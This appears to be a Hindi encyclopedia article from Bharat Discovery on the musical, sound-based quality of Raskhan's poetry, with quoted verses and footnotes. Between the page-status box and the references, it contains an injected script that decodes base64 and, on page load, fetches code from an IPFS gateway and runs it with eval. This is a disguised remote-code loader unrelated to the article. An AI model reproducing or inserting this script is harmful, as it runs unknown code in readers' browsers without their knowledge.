रसखान- नादात्मकता

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

छंदों की गेयता प्रभावोत्पादन में निस्सन्देह वृद्धि करती है। उत्तम छन्द वही माना जाता है जिसमें उपयुक्त शब्द योजना और संगीत तत्त्व हो। रसखान की भाषा में नादात्मकता के दर्शन होते हैं। संगीत तत्त्व ने भावानुभूति के लिए एक सजीव और मनोरम वातावरण उत्पन्न कर दिया है। रसखान के काव्य में एक मधुर आकार की अनुभूति होती है। रसखान के सुन्दर शब्दों एवं वर्णों के चयन से उनके कवित्तों औ सवैयों में बरबस संगीतात्मकता आ जाती है। उनके समाप्त हो जाने के बाद भी संगीतात्मकता की झंकृति कर्ण-कुहरों में प्रतिध्वनित होती रहती है।[1]

  • अनुप्रास के विभिन्न रूपों के संयुक्त प्रयोग द्वारा निर्मित इस सवैये का संगीत सुनने योग्य है—

बिहरै पिय प्यारी सनेह सने छहरै चुनरी के झवा झहरैं।
सिहरैं नवजोवन रंग अनंग सुभंग अपांगनि की गहरैं।
बहरैं रसखानि नदी रस की घहरैं बनिता कुल हू भहरैं।
कहरैं बिरही जन आतप सौं लहरैं लली लाल लिए पहरैं॥[2]

इस पद में नादात्मकता की सफल स्वाभाविक निबन्धना हुई है। झंकार की-सी प्रतिध्वनि हो रही है। रसखान की भाषा प्रवाहमयी और संगीतपूर्ण है। कवि की लेखनी से निकला हुआ एक-एक शब्द लय सृजन में योग दे रहा है। रसखान की भाषा का सबसे बड़ा गुण यह है कि प्रत्येक शब्द छन्द के उतार-चढ़ाव के अनुरूप लय के अनुसार बोलता है। वर्ण-संगीत के द्वारा निर्मित आंतरिक संगीत रसखान के काव्य-माधुर्य का प्रधान तत्त्व है। होली के प्रसंगों में संगीत की ध्वनि सुनाई पड़ती है—

खेलत फाग सुहाग भरी अनुरागहिं लालन कौं धरि कै।
मारत कुंकम केसरि के, पिचकारिन में रंग कौं भरि कै।
गेरत लाला गुलाल लली मन मोहिनि मौज मिटा करि कै।
जात चली रसखानि अली मदमत्त मनौ मन कौं हरि कै॥[3]

  • शिव-स्तुति प्रसंग में भी उनकी शब्दावली इसी संगीतमयी गति से प्रवाहित है—

यह देखि धतूरे के पात चबात औ गात सों धूलि लगावत हैं।
चहुँ ओर जटा अँटकै लटकै फनिसो कफ़नी फहरावत हैं।
रसखानि जेई चितवै चित दै तिनके दुखदुन्द भजावत हैं।
गजखाल कपाल की माल बिसाल सौ गाल बजावत आवत है।[4]

  • रसखान ने शब्दों को उस प्रकार संजोया है कि उनमें नाद सौन्दर्य झलक रहा है— 'पाले परी मैं अकेली लली लला लाज लियौ सुकियो मन भायौ।[5]'
  • वास्तविकता यह है कि रसखान द्वारा संयोजित वर्ण-संगीत के उदाहरण में उनका पूरा काव्य रखा जा सकता है।

गावैं गुनी गनिका गंधरब्बब औ सारद सेष सबै गुन गावत।
नाम अनन्त गनन्त गनेस ज्यौं ब्रह्मा त्रिलोचन पार न पावत।
जोगी जती तपसी अरु सिद्ध निरन्तर जाहिं समाधि लगावत।
ताहि अहीर को छोहरिया छछिया भरि छाछ पै नाच नचावत॥[6]

अंतिम पंक्ति की ध्वन्यर्थ व्यंजना विशेष ध्यान देने योग्य है। वर्ण और शब्द योजना द्वारा आंतरिक संगीत की निबंधना रसखान की भाषा की विशेषता है।

  • प्राय: पद्य में शब्द ध्वनित होते दिखाई पड़ते हैं— 'या मुरली मुरलीधर की अधरान धरी अधरा न धरौगी।[7]'
  • त्यौं रसखानि वही रसखानि जु है रसखानि सौ है रसखानि।[8]
  • रसखान ने समान वर्ण वाले शब्दों की आवृत्ति द्वारा भाषा में प्रवाह और लय का निर्माण किया है-

तें न लख्यौ जब कुंजन तें बनि के निकस्यौ भटक्यौ मटक्यौ री।
सौहत कैसो हरा टटक्यौ अरु कैसो किरीट लसै लटक्यौ री।
कौ रसखानि फिरै भटक्यौ हटक्यौ ब्रज लोग फिरै भटक्यौ री।
रूप सबै हरि वा नट को हियरें अटक्यो अटक्यो अटक्यौ री॥[9]

रसखान की भाषा में नादात्मकता भावव्यंजना के अनुकूल है। इन्होंने केशव आदि रीतिकालीन कवियों की भांति शब्दों से खिलवाड़ नहीं की। इनकी भाषा में शब्दाग्रह नहीं। भाषा की नादात्मकता श्रुतिपेशल तथा प्रतिपाद्य के अनुकूल है। उसमें स्वाभाविक सौन्दर्य एवं संगीत की कमनीयता अवलोकनीय है।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

  1. रसखान (जीवन और कृतित्व), पृ. 185
  2. सुजान रसखान, 189
  3. सुजान रसखान, 191
  4. सुजान रसखान, 211
  5. सुजान रसखान, 43
  6. सुजान रसखान, 12
  7. सुजान रसखान, 86
  8. सुजान रसखान, 4
  9. सुजान रसखान, 167

बाहरी कड़ियाँ

संबंधित लेख